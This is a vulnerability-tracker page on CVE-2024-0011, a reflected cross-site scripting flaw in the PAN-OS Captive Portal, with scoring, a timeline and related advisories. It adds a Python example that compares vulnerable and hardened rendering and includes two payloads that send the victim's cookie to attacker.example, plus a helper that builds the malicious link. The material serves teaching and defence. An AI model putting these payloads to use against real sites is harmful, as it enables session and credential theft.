CVE-2024-0011

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

Published: Feb 14, 2024 / Updated: 9mo ago

CVSS 4.3 (Medium, NVD v3.1 base; the vendor bulletin quoted under News scores it 5.1 on CVSS v4.0) | EPSS 0.04%

A reflected cross-site scripting (XSS) vulnerability in the Captive Portal feature of Palo Alto Networks PAN-OS software enables execution of malicious JavaScript (in the context of an authenticated Captive Portal user’s browser) if a user clicks on a malicious link, allowing phishing attacks that could lead to credential theft.
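The bug class behind the description above, shown as an added example that is not PAN-OS code and not taken from the Palo Alto Networks advisory: a minimal captive-portal login page that reflects two request parameters, a status banner `msg` (element context) and the post-login destination `url` (quoted-attribute context), first without output encoding and then hardened. The page shape, the parameter names, the `portal.example` and `attacker.example` hosts and both payloads are assumptions constructed for this example; the real sink and parameter in PAN-OS are not stated on this page.

```python
"""Reflected XSS in a captive-portal login page: vulnerable vs hardened rendering.

Added illustration of CWE-79, not PAN-OS code. Parameter names ("msg", "url"),
page layout, hosts and payloads are assumptions constructed for this example.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit


def _params(query: str) -> dict:
    """Parse a query string the way a portal handler would: first value wins."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_login_vulnerable(query: str) -> str:
    """Reflect request parameters into HTML with no output encoding.

    'msg' lands in element context, 'url' inside a single-quoted attribute;
    each context has its own breakout payload and neither is neutralized.
    """
    p = _params(query)
    msg, url = p.get("msg", ""), p.get("url", "/")
    return (
        "<html><body>"
        f"<p class='banner'>{msg}</p>"
        "<form method='post' action='/login'>"
        f"<input type='hidden' name='url' value='{url}'>"
        "<input name='user'><input name='pass' type='password'>"
        "</form></body></html>"
    )


def safe_redirect_target(url: str) -> str:
    """Accept only a same-site absolute path as the post-login destination.

    Rejects scheme-qualified, protocol-relative ('//host') and 'javascript:'
    targets, which would otherwise make the portal an open redirect for phishing.
    """
    parts = urlsplit(url)
    if parts.scheme or parts.netloc or not url.startswith("/") or url.startswith("//"):
        return "/"
    return url


def render_login_hardened(query: str) -> str:
    """Same page with context-appropriate HTML encoding and a constrained redirect."""
    p = _params(query)
    msg = p.get("msg", "")
    url = safe_redirect_target(p.get("url", "/"))
    return (
        "<html><body>"
        f"<p class='banner'>{escape(msg, quote=True)}</p>"
        "<form method='post' action='/login'>"
        f"<input type='hidden' name='url' value='{escape(url, quote=True)}'>"
        "<input name='user'><input name='pass' type='password'>"
        "</form></body></html>"
    )


def build_attack_link(portal_base: str, query: str) -> str:
    """Attacker side: the 'malicious link' a victim is sent, percent-encoded for transport."""
    return f"{portal_base}?{quote(query, safe='=&')}"


class _InjectionFinder(HTMLParser):
    """Records script elements and on* event-handler attributes in rendered HTML."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("script element")
        self.hits.extend(f"{tag}@{name}" for name, _ in attrs if name.startswith("on"))


def injected_handlers(html: str) -> list:
    """Triage aid: list the executable sinks present in a rendered page."""
    finder = _InjectionFinder()
    finder.feed(html)
    finder.close()
    return finder.hits


# Constructed payloads (not from the advisory), one per injection context.
# Both send the victim's cookie to an attacker host: the credential-theft outcome.
PAYLOAD_ELEMENT = "msg=<script>fetch(`https://attacker.example/?c=${document.cookie}`)</script>"
PAYLOAD_ATTRIBUTE = "url=/x' autofocus onfocus='fetch(`https://attacker.example/?c=${document.cookie}`)"

if __name__ == "__main__":
    for label, payload in (("element", PAYLOAD_ELEMENT), ("attribute", PAYLOAD_ATTRIBUTE)):
        q = urlsplit(build_attack_link("https://portal.example/login", payload)).query
        print(label, "vulnerable:", injected_handlers(render_login_vulnerable(q)))
        print(label, "hardened:  ", injected_handlers(render_login_hardened(q)))
```

The attribute payload contains no `<`, so a filter that only strips tags would let it through; what stops it is encoding quotes for the attribute context, which `escape(..., quote=True)` does. The redirect check is separate from the XSS fix: the advisory's impact is phishing and credential theft, and a portal that forwards an authenticated user to an arbitrary `url` after login hands an attacker a second route to the same outcome. `injected_handlers` is a parsing aid for inspecting your own output, not a substitute for the scanner coverage listed in the timeline.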

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Timeline

CVE Assignment

NVD published the first details for CVE-2024-0011

Feb 14, 2024 at 10:15 AM
First Article

Feedly found the first article mentioning CVE-2024-0011.

Feb 14, 2024 at 6:21 PM / National Vulnerability Database
Detection in Vulnerability Scanners

Detection for the vulnerability has been added to Nessus (190585)

Feb 15, 2024 at 2:15 PM
EPSS

EPSS Score was set to: 0.04% (Percentile: 6.7%)

Feb 15, 2024 at 2:33 PM

Affected Systems

Paloaltonetworks/pan-os

Attack Patterns

CAPEC-209: XSS Using MIME Type Mismatch

News

Palo Alto Networks security advisory listing (April 2024)
CVSS 10 | CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect | fixed in >= 11.1.2-h3, >= 11.0.4-h1, >= 10.2.9-h1 (see additional hotfixes in Solution section) | published 2024-04-12, updated 2024-04-15
CVSS 8.3 | CVE-2024-3383 PAN-OS: Improper Group Membership Change Vulnerability in Cloud Identity Engine (CIE) | fixed in >= 11.0.3, >= 10.2.5, >= 10.1.11 | 2024-04-10
CVSS 8.2 | CVE-2024-3385 PAN-OS: Firewall Denial of Service (DoS) when GTP Security is Disabled | fixed in >= 11.0.3, >= 10.2.8, >= 10.1.12, >= 9.1.17, >= 9.0.17-h4 | 2024-04-10
CVSS 8.2 | CVE-2024-3382 PAN-OS: Firewall Denial of Service (DoS) via a Burst of Crafted Packets | fixed in >= 11.1.2, >= 11.0.4, >= 10.2.7-h3 | 2024-04-10
CVSS 8.2 | CVE-2024-3384 PAN-OS: Firewall Denial of Service (DoS) via Malformed NTLM Packets | fixed in >= 10.0.12, >= 9.1.15-h1, >= 9.0.17, >= 8.1.24 | 2024-04-10
CVSS 6.9 | CVE-2024-3386 PAN-OS: Predefined Decryption Exclusions Does Not Work as Intended | fixed in >= 11.0.1-h2 or >= 11.0.2, >= 10.2.4-h2 or >= 10.2.5, >= 10.1.9-h3 or >= 10.1.10, >= 10.0.13, >= 9.1.17, >= 9.0.17-h2 | 2024-04-10
CVSS 6 | CVE-2024-3387 PAN-OS: Weak Certificate Strength in Panorama Software Leads to Sensitive Information Disclosure | fixed in >= 11.0.4 on Panorama, >= 10.2.7-h3 or >= 10.2.8 on Panorama, >= 10.1.12 on Panorama | 2024-04-10
CVSS 5.1 | CVE-2024-3388 PAN-OS: User Impersonation in GlobalProtect SSL VPN | fixed in >= 11.0.3, >= 10.2.7-h3, >= 10.1.11-h4, >= 9.1.17, >= 9.0.17-h4, >= 8.1.26, >= 10.2.4 | 2024-04-10
Informational | PAN-SA-2024-0004 Informational Bulletin: OSS CVEs fixed in PAN-OS Versions prior to those listed above | 2024-04-10
Informational | PAN-SA-2024-0003 Informational Bulletin:
Rewterz Threat Advisory – Multiple Palo Alto Networks PAN-OS Vulnerabilities
Palo Alto Networks PAN-OS is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the GlobalProtect portal feature. Palo Alto Networks PAN-OS is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the web interface on Panorama appliances.
PAN-OS: CVSS (Max): 5.1
AusCERT External Security Bulletin Redistribution ESB-2024.1179, 26 February 2024
CVE-2024-0011 PAN-OS: Reflected Cross-Site Scripting (XSS) Vulnerability in Captive Portal Authentication
Product: PAN-OS
Publisher: Palo Alto Networks
Operating System: Network Appliance
Resolution: Patch/Upgrade
CVE Names: CVE-2024-0011
Original Bulletin: https://securityadvisories.paloaltonetworks.com/CVE-2024-0011
Comment: CVSS (Max): 5.1 CVE-2024-0011 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/AU:N/R:A/V:D/RE:L/U:Amber) CVSS Source:
Palo Alto Networks PAN-OS cross-site scripting CVE-2024-0011 - https://www.redpacketsecurity.com/palo-alto-networks-pan-os-cross-site-scripting-cve-2024-0011/ #CVE #Vulnerability #OSINT #ThreatIntel #Cyber

CVSS V3.1

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
